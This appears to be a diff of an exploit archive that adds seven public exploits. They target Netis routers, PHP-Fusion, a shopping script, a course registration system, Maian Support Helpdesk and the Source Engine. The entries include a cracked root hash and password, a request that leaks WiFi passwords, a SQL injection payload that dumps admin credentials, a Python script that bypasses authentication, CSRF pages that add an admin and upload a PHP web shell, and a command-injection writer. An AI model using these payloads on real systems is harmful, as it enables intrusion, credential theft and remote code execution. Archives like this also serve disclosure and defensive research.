DB: 2020-04-28

7 changes to exploits/shellcodes

Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution
PHP-Fusion 9.03.50 - 'Edit Profile' Arbitrary File Upload
Netis E1+ 1.2.32533 - Backdoor Account (root)
Online shopping system advanced 1.0 - 'p' SQL Injection
Netis E1+ V1.2.32533 - Unauthenticated WiFi Password Leak
Online Course Registration 2.0 - Authentication Bypass
Maian Support Helpdesk 4.3 - Cross-Site Request Forgery (Add Admin)

exploits/hardware/webapps/48382.txt

@@ -0,0 +1,21 @@
+# Exploit Title: Netis E1+ 1.2.32533 - Backdoor Account (root)
+# Date: 2020-04-25
+# Author: Besim ALTINOK
+# Vendor Homepage: http://www.netis-systems.com
+# Software Link: http://www.netis-systems.com/Suppory/downloads/dd/1/img/204
+# Version: V1.2.32533
+# Tested on: Netis E1+ V1.2.32533
+# Credit: İsmail BOZKURT
+-----------------------------
+
+*root:abSQTPcIskFGc:0:0:root:/:/bin/sh*
+
+
+Created directory: /home/pentestertraining/.john
+Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 SSE2-16])
+Press 'q' or Ctrl-C to abort, almost any other key for status
+Warning: MaxLen = 13 is too large for the current hash type, reduced
+to 8*realtek          (root)*
+1g 0:00:00:28 3/3 0.03533g/s 1584Kp/s 1584Kc/s 1584KC/s realka2..reasll5
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed

exploits/hardware/webapps/48384.txt

@@ -0,0 +1,31 @@
+# Exploit Title: Netis E1+ 1.2.32533 - Unauthenticated WiFi Password Leak
+# Date: 2020-04-25
+# Author: Besim ALTINOK
+# Vendor Homepage: http://www.netis-systems.com
+# Software Link: http://www.netis-systems.com/Suppory/downloads/dd/1/img/204
+# Version: V1.2.32533
+# Tested on: Netis E1+ V1.2.32533
+# Credit: İsmail BOZKURT
+-----------------------------
+
+HTTP Request
+-------------------------------------------
+GET //netcore_get.cgi HTTP/1.1
+Host: netisext.cc
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:68.0)
+Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Cookie: homeFirstShow=yes
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+
+
+Detail of the HTTP Response:
+-------------------------------------------
+hange_name':'[ ]','ddns_domain':'','ddns_info':'[ ]','time_now':'01/14/2015
+09:58:51','timezone':'-8
+1','time_type':'1','daylight_save':'1','time_server':'65.55.56.206','time_date':'2015','time_date2':'1','time_date3':'14','time_time':'9','time_time2':'58','time_time3':'51','old_user':'','def_pwd_flag':'1','old_pwd':'','wakeup_mac':'00:00:00:00:00:00','rp_config_status':'35','rp_client_status':'3','rp_ap_ssid':'ExampleSSID','rp_ap_password':'WiFiPass123','rp_ap_users':'1','rp_client_ssid':'TestSSID','rp_client_bssid':'98:e7:f5:ab:95:ad','rp_client_password':'WiFiPass123','rp_client_time':'357','rp_client_signals':'65','rp_client_speeds':'117','rp_roaming_onoff':'16','rp_soon_ssid':'TestSSID','rp_soon_password':'WiFiPass123','rr_current_mode':'1','rp_diagnose_status':'0',"statistics_list":[{'type':'LAN','tx_pack':'0','rx_pack':'0','t

exploits/php/webapps/48381.txt

@@ -0,0 +1,52 @@
+# Exploit Title: PHP-Fusion 9.03.50 - 'Edit Profile' Arbitrary File Upload
+# Date: 2020-04-24
+# Author: Besim ALTINOK
+# Vendor Homepage: https://www.php-fusion.co.uk/home.php
+# Software Link: https://sourceforge.net/projects/php-fusion/files/PHP-Fusion%20Archives/9.x/PHP-Fusion%209.03.50.zip/download
+# Version: v9.03.50
+# Tested on: Xampp
+# Credit: İsmail BOZKURT and AkkuS
+
+-------------------------------------------------------------------------------------------------
+Description
+---
+- This system does not check the file extension when user upload photo for
+avatar :). So you can upload PHP file like:
+
+Content of the file
+--
+Sample PHP code: <? phpinfo(); ?>
+
+Name of the file:
+---
+Sample PHP File name: tester.php
+
+- When you want to try to upload the image to the avatar, just, try to
+change the file name and content.
+
+----------------------------------------------------------------------------------------
+Vulnerable code section in the UserFieldsInput.inc
+----------------------------------------------------------
+    private function _setUserAvatar() {
+        if (isset($_POST['delAvatar'])) {
+            if ($this->userData['user_avatar'] != "" &&
+file_exists(IMAGES."avatars/".$this->userData['user_avatar']) &&
+is_file(IMAGES."avatars/".$this->userData['user_avatar'])) {
+                unlink(IMAGES."avatars/".$this->userData['user_avatar']);
+            }
+            $this->data['user_avatar'] = '';
+        }
+        if (isset($_FILES['user_avatar']) &&
+$_FILES['user_avatar']['name']) { // uploaded avatar
+            if (!empty($_FILES['user_avatar']) &&
+is_uploaded_file($_FILES['user_avatar']['tmp_name'])) {
+                $upload = form_sanitizer($_FILES['user_avatar'], '',
+'user_avatar');
+                if (isset($upload['error']) && !$upload['error']) {
+                    // ^ maybe use empty($upload['error']) also can but
+maybe low end php version has problem on empty.
+                    $this->data['user_avatar'] = $upload['image_name'];
+                }
+            }
+        }
+    }

exploits/php/webapps/48383.txt

@@ -0,0 +1,25 @@
+# Exploit Title: Online shopping system advanced 1.0 - 'p' SQL Injection
+# Exploit Author : Majid kalantari
+# Date: 2020-04-26
+# Vendor Homepage : https://github.com/PuneethReddyHC/online-shopping-system-advanced
+# Software link: https://github.com/PuneethReddyHC/online-shopping-system-advanced/archive/master.zip
+# Version: -
+# Tested on: Windows 10
+# CVE: N/A
+===============================================
+
+# vulnerable file: product.php
+
+# vulnerable parameter : p
+
+# payload :
+http://127.0.0.1:8081/phps/product.php?p=-10+union+select+1,2,3,concat(admin_email,%27----%27,admin_password),5,6,7,8+from+admin_info%23#
+!
+
+#Description: ($product_id input is not safe)
+
+Line 46:
+$product_id = $_GET['p'];
+$sql = " SELECT * FROM products ";
+$sql = " SELECT * FROM products WHERE product_id = $product_id";
+===============================================

exploits/php/webapps/48385.txt

@@ -0,0 +1,69 @@
+# Exploit Title: Online Course Registration 2.0 - Authentication Bypass
+# Google Dork: N/A
+# Date: 2020-04-25
+# Exploit Author: Daniel Monzón (stark0de)
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/online-course-registration-free-download/
+# Version: 2.0
+# Tested on: Kali Linux x64 5.4.0
+# CVE : N/A
+
+#There are multiple SQL injection vulnerabilities in Online Course Registration #PHP script:
+
+#./check_availability.php:               $result =mysqli_query($con,"SELECT studentRegno FROM    courseenrolls WHERE course='$cid' and studentRegno=' $regid'");
+#./check_availability.php:               $result =mysqli_query($con,"SELECT * FROM courseenrolls WHERE course='$cid'");
+#./check_availability.php:               $result1 =mysqli_query($con,"SELECT noofSeats FROM course WHERE id='$cid'");
+#./change-password.php:$sql=mysqli_query($con,"SELECT password FROM  students where password='".md5($_POST['cpass'])."' && studentRegno='".$_SESSION['login']."'");
+#./admin/check_availability.php:         $result =mysqli_query($con,"SELECT StudentRegno FROM students WHERE StudentRegno='$regno'");
+#./admin/change-password.php:$sql=mysqli_query($con,"SELECT password FROM  admin where password='".md5($_POST['cpass'])."' && username='".$_SESSION['alogin']."'");
+#./admin/index.php:$query=mysqli_query($con,"SELECT * FROM admin WHERE username='$username' and password='$password'");
+#./index.php:$query=mysqli_query($con,"SELECT * FROM students WHERE StudentRegno='$regno' and password='$password'");
+#./includes/header.php:        $ret=mysqli_query($con,"SELECT  * from userlog where studentRegno='".$_SESSION['login']."' order by id desc limit 1,1");
+#./pincode-verification.php:$sql=mysqli_query($con,"SELECT * FROM  students where pincode='".trim($_POST['pincode'])."' && StudentRegno='".$_SESSION['login']."'");
+
+#It is also possible to bypass the authentication in the two login pages:
+#!/usr/bin/python3
+try:
+   from termcolor import colored 
+   from colorama import init
+   import argparse
+   import requests
+except:
+	print("Please run pip3 install termcolor,colorama,argparse,requests")
+
+init()
+
+symbol_green=colored("[+]", 'green') 
+symbol_red=colored("[-]", 'red') 
+
+parser = argparse.ArgumentParser()
+parser.add_argument('url', help='The URL of the target.')
+args = parser.parse_args()
+
+adminurl = args.url + '/onlinecourse/admin/'
+
+
+
+def main():
+    initial='Online Course Registration Authentication Bypass in %s' % ( args.url ) + "\n"
+    print(colored(initial, 'yellow'))
+    sess = requests.session()
+    data_login = {
+    'username': "admin' or 1=1 -- ",
+    'password': 'whatever',
+    'submit': ''
+}
+    try:
+        req = sess.post(adminurl, data=data_login, verify=False, allow_redirects=True)
+        resp_code = req.status_code
+    except:
+    	print(symbol_red+" The request didn't work!\n")
+    	exit()
+    if resp_code == 200 and "document.chngpwd.cpass.value" in req.text:
+       print(symbol_green+" Authentication bypassed for admin user!\n")
+       print(symbol_green+" To test this manually, visit: " + adminurl+ " and enter: admin' or 1=1 -- in the username field and whatever in password field, then click the Log Me In button\n")
+
+    else:
+       print(symbol_red+" Fail!")
+
+main()

exploits/php/webapps/48386.txt

@@ -0,0 +1,170 @@
+# Exploit Title: Maian Support Helpdesk 4.3 - Cross-Site Request Forgery (Add Admin)
+# Date: 2020-04-26
+# Author: Besim ALTINOK
+# Vendor Homepage: https://www.maiansupport.com
+# Software Link: https://www.maiansupport.com/zip.html
+# Version: v4.3
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+----------------------------------------------
+
+Here is the Detail:
+--------------------------------------------------
+This product is unprotected against CSRF vulnerabilities. With this attack,
+you can add an admin account to the system. In addition, you can add files
+from the F.A.Q field as admin.There are no file restrictions here.
+Therefore, you can upload a PHP file here with CSRF.
+
+If you want, you can add an admin account first and then access the system
+and upload files.
+Or you can upload files with direct admin rights.
+
+---------------------------------------------------
+CSRF PoC - 1 (Add Administrator user)
+-------------------------------------
+
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://localhost/helpdesk/admin/index.php?ajax=team"
+method="POST">
+      <input type="hidden" name="enabled" value="yes" />
+      <input type="hidden" name="admin" value="yes" />
+      <input type="hidden" name="welcome" value="yes" />
+      <input type="hidden" name="name" value="Besim&#32;ALTINOK" />
+      <input type="hidden" name="email" value="test2&#64;gmail&#46;com" />
+      <input type="hidden" name="accpass" value="111111" />
+      <input type="hidden" name="timezone" value="0" />
+      <input type="hidden" name="language" value="" />
+      <input type="hidden" name="addpages" value="" />
+      <input type="hidden" name="notePadEnable" value="yes" />
+      <input type="hidden" name="enableLog" value="yes" />
+      <input type="hidden" name="mergeperms" value="yes" />
+      <input type="hidden" name="profile" value="yes" />
+      <input type="hidden" name="ticketHistory" value="yes" />
+      <input type="hidden" name="close" value="yes" />
+      <input type="hidden" name="lock" value="yes" />
+      <input type="hidden" name="editperms&#91;&#93;" value="ticket" />
+      <input type="hidden" name="editperms&#91;&#93;" value="reply" />
+      <input type="hidden" name="timer" value="yes" />
+      <input type="hidden" name="startwork" value="yes" />
+      <input type="hidden" name="workedit" value="yes" />
+      <input type="hidden" name="notify" value="yes" />
+      <input type="hidden" name="spamnotify" value="yes" />
+      <input type="hidden" name="signature" value="" />
+      <input type="hidden" name="nameFrom" value="" />
+      <input type="hidden" name="emailFrom" value="" />
+      <input type="hidden" name="email2" value="" />
+      <input type="hidden" name="notes" value="" />
+      <input type="hidden" name="mailbox" value="yes" />
+      <input type="hidden" name="mailDeletion" value="yes" />
+      <input type="hidden" name="mailScreen" value="yes" />
+      <input type="hidden" name="mailCopy" value="yes" />
+      <input type="hidden" name="mailFolders" value="5" />
+      <input type="hidden" name="mailPurge" value="0" />
+      <input type="hidden" name="digest" value="yes" />
+      <input type="hidden" name="process" value="1" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+
+- After the Add admin account, you can upload the PHP file.
+
+CSRF PoC 2 - ( Directly, File Upload)
+----------------------------------------------------
+
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <script>
+      function submitRequest()
+      {
+        var xhr = new XMLHttpRequest();
+        xhr.open("POST",
+"http:\/\/localhost\/helpdesk\/admin\/index.php?ajax=faqattach", true);
+        xhr.setRequestHeader("Accept", "application\/json,
+text\/javascript, *\/*; q=0.01");
+        xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
+        xhr.setRequestHeader("Content-Type", "multipart\/form-data;
+boundary=---------------------------1851832753272583700731626849");
+        xhr.withCredentials = true;
+        var body =
+"-----------------------------1851832753272583700731626849\r\n" +
+          "Content-Disposition: form-data; name=\"file[]\";
+filename=\"shell.php\"\r\n" +
+          "Content-Type: text/php\r\n" +
+          "\r\n" +
+          "\x3c?php echo system($_GET[\'cmd\']); ?\x3e\n" +
+          "\r\n" +
+          "-----------------------------1851832753272583700731626849\r\n" +
+          "Content-Disposition: form-data; name=\"file[]\"\r\n" +
+          "\r\n" +
+          "\r\n" +
+          "-----------------------------1851832753272583700731626849\r\n" +
+          "Content-Disposition: form-data; name=\"remote[]\"\r\n" +
+          "\r\n" +
+          "\r\n" +
+          "-----------------------------1851832753272583700731626849\r\n" +
+          "Content-Disposition: form-data; name=\"remote[]\"\r\n" +
+          "\r\n" +
+          "\r\n" +
+          "-----------------------------1851832753272583700731626849\r\n" +
+          "Content-Disposition: form-data; name=\"remote[]\"\r\n" +
+          "\r\n" +
+          "\r\n" +
+          "-----------------------------1851832753272583700731626849\r\n" +
+          "Content-Disposition: form-data; name=\"process\"\r\n" +
+          "\r\n" +
+          "1\r\n" +
+          "-----------------------------1851832753272583700731626849\r\n" +
+          "Content-Disposition: form-data; name=\"opath\"\r\n" +
+          "\r\n" +
+          "\r\n" +
+          "-----------------------------1851832753272583700731626849--\r\n";
+        var aBody = new Uint8Array(body.length);
+        for (var i = 0; i < aBody.length; i++)
+          aBody[i] = body.charCodeAt(i);
+        xhr.send(new Blob([aBody]));
+      }
+    </script>
+    <form action="#">
+      <input type="button" value="Submit request"
+onclick="submitRequest();" />
+    </form>
+  </body>
+</html>
+
+HTTP Request:
+-----------------------------------------------------------------------------------------
+GET /helpdesk/content/attachments-faq/shell.php?cmd=ls HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:68.0)
+Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=4574c8e8190d39edd9d13a0fd9a502ec;
+bp_ut_session={"pageviews":1,"referrer":"
+http://localhost/olms/library/assets/js/images/","landingPage":"
+http://localhost/olms/library/assets/js/images/sort_asc.html
+","started":1587817504988};
+HESKb910af33bb5d80030b1f4b6f8666b57fac433d4d=71c43ff24f63f83f5a34d28997251db6
+Upgrade-Insecure-Requests: 1
+
+HTTP Response:
+-------------------------------------------------------------------------------------------------
+HTTP/1.1 200 OK
+Date: Sun, 26 Apr 2020 12:15:31 GMT
+Server: Apache/2.4.43 (Unix) OpenSSL/1.1.1f PHP/7.2.29 mod_perl/2.0.8-dev
+Perl/v5.16.3
+X-Powered-By: PHP/7.2.29
+Content-Length: 39
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+shell.php
+shell_test.php
+shell_test.php

exploits/windows/local/48387.txt

@@ -0,0 +1,32 @@
+# Exploit Title: Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution
+# Date: 2020-04-27
+# Exploit Author: 0xEmma/BugByte/SebastianPC
+# Vendor Homepage: https://www.valvesoftware.com/en/
+# Version: Source Engine, Tested on CS:GO BuildID: 4937372 TF2 BuildID: 4871679 Garry's Mod BuildID: 4803834 Half Life 2 BuildID: 4233302
+# Tested on: MacOS 15.3
+# CVE : N/A
+
+import os, random, sys
+banner = """
+:'######:::'#######::'##::::'##::'######:::'#######::'##:::'##::::'##:::'########:
+'##... ##:'##.... ##: ##:::: ##:'##... ##:'##.... ##: ##::'##:::'####:::... ##..::
+ ##:::..:: ##'### ##: ##:::: ##: ##:::..::..::::: ##: ##:'##::::.. ##:::::: ##::::
+. ######:: ## ### ##: ##:::: ##: ##::::::::'#######:: #####::::::: ##:::::: ##::::
+:..... ##: ## #####:: ##:::: ##: ##::::::::...... ##: ##. ##:::::: ##:::::: ##::::
+'##::: ##: ##.....::: ##:::: ##: ##::: ##:'##:::: ##: ##:. ##::::: ##:::::: ##::::
+. ######::. #######::. #######::. ######::. #######:: ##::. ##::'######:::: ##::::
+:......::::.......::::.......::::......::::.......:::..::::..:::......:::::..:::::
+"""
+print(banner)
+
+
+if os.name == "posix":
+    command = str(input("Code to run? "))
+    payload = '"; ' + command + '; echo "'
+    f = open("/tmp/hl2_relaunch", "w")
+
+    f.write(payload)
+    f.close()
+
+if os.name == "nt":
+    print("Windows based OS's not supported, see CVE-2020-12242")

files_exploits.csv

@@ -11039,6 +11039,7 @@ id,file,description,date,author,type,platform,port
 48359,exploits/solaris/local/48359.c,"Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation",2020-04-21,"Marco Ivaldi",local,solaris,
 48364,exploits/windows/local/48364.py,"RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH)",2020-04-22,"Felipe Winsnes",local,windows,
 48378,exploits/windows/local/48378.txt,"Popcorn Time 6.2 - 'Update service' Unquoted Service Path",2020-04-24,"Uriel Yochpaz",local,windows,
+48387,exploits/windows/local/48387.txt,"Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution",2020-04-27,0xEmma,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42615,3 +42616,9 @@ id,file,description,date,author,type,platform,port
 48376,exploits/multiple/webapps/48376.txt,"EspoCRM 5.8.5 - Privilege Escalation",2020-04-24,Besim,webapps,multiple,
 48377,exploits/hardware/webapps/48377.txt,"Edimax EW-7438RPn 1.13 - Remote Code Execution",2020-04-24,Besim,webapps,hardware,
 48380,exploits/java/webapps/48380.txt,"Furukawa Electric ConsciusMAP 2.8.1 - Remote Code Execution",2020-04-24,LiquidWorm,webapps,java,
+48381,exploits/php/webapps/48381.txt,"PHP-Fusion 9.03.50 - 'Edit Profile' Arbitrary File Upload",2020-04-27,Besim,webapps,php,
+48382,exploits/hardware/webapps/48382.txt,"Netis E1+ 1.2.32533 - Backdoor Account (root)",2020-04-27,Besim,webapps,hardware,
+48383,exploits/php/webapps/48383.txt,"Online shopping system advanced 1.0 - 'p' SQL Injection",2020-04-27,"Majid kalantari",webapps,php,
+48384,exploits/hardware/webapps/48384.txt,"Netis E1+ V1.2.32533 - Unauthenticated WiFi Password Leak",2020-04-27,Besim,webapps,hardware,
+48385,exploits/php/webapps/48385.txt,"Online Course Registration 2.0 - Authentication Bypass",2020-04-27,"Daniel Monzón",webapps,php,
+48386,exploits/php/webapps/48386.txt,"Maian Support Helpdesk 4.3 - Cross-Site Request Forgery (Add Admin)",2020-04-27,Besim,webapps,php,